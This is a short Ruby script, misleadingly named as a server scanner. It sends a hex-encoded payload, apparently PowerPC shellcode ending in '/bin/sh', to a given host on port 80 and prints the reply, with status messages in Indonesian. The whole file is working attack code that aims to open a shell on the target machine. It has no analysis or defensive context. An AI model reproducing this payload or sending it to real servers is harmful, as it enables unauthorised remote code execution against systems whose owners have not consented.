require 'socket'

def server_scanner_def(url)
	payloads = "\x7c\x3f\x0b\x78"+	
	"\x3b\x40\x01\x0e"+
    "\x3b\x5a\xfe\xf4"+
    "\x7f\x43\xd3\x78"+
    "\x3b\x60\x01\x0d"+
    "\x3b\x7b\xfe\xf4"+ 
    "\x7f\x64\xdb\x78"+ 
    "\x7c\xa5\x2a\x78"+ 
    "\x7c\x3c\x0b\x78"+ 
    "\x3b\x9c\x01\x0c"+ 
    "\x90\x7c\xff\x08"+ 
    "\x90\x9c\xff\x0c"+ 
    "\x90\xbc\xff\x10"+ 
    "\x7f\x63\xdb\x78"+ 
    "\x3b\xdf\x01\x0c"+ 
    "\x38\x9e\xff\x08"+ 
    "\x3b\x20\x01\x98"+ 
    "\x7f\x20\x16\x70"+ 
    "\x44\xde\xad\xf2"+ 
    "\x7c\x78\x1b\x78"+ 
    "\xb3\x5e\xff\x16"+ 
    "\x7f\xbd\xea\x78"+ 
    "\x63\xbd"+
    "\xb3\xbe\xff\x18"+
    "\x3f\xa0"+
    "\x63\xbd"+
    "\x93\xbe\xff\x1a"+
    "\x93\x1c\xff\x08"+ 
    "\x3a\xde\xff\x16"+
    "\x92\xdc\xff\x0c"+
    "\x3b\xa0\x01\x1c"+
    "\x38\xbd\xfe\xf4"+
    "\x90\xbc\xff\x10"+
    "\x7f\x20\x16\x70"+
    "\x7c\x7a\xda\x14"+
    "\x38\x9c\xff\x08"+
    "\x44\xde\xad\xf2"+
    "\x7f\x03\xc3\x78"+
    "\x7c\x84\x22\x78"+
    "\x3a\xe0\x01\xf8"+
    "\x7e\xe0\x1e\x70"+
    "\x44\xde\xad\xf2"+ 
    "\x7f\x03\xc3\x78"+ 
    "\x7f\x64\xdb\x78"+ 
    "\x7e\xe0\x1e\x70"+ 
    "\x44\xde\xad\xf2"+ 
    "\x7c\xa5\x2a\x79"+ 
    "\x42\x40\xff\x35"+ 
    "\x7f\x08\x02\xa6"+ 
    "\x3b\x18\x01\x34"+ 
    "\x98\xb8\xfe\xfb"+ 
    "\x38\x78\xfe\xf4"+ 
    "\x90\x61\xff\xf8"+ 
    "\x38\x81\xff\xf8"+ 
    "\x90\xa1\xff\xfc"+
    "\x3b\xc0\x01\x60"+ 
    "\x7f\xc0\x2e\x70"+ 
    "\x44\xde\xad\xf2"+ 
    "/bin/shZ"
    s = TCPSocket.new(url,80)
    s.write(payloads)
    puts "data berhasil di kirim.\nmembaca data"
    while line = s.gets
    	puts "data : #{line}"
    end
end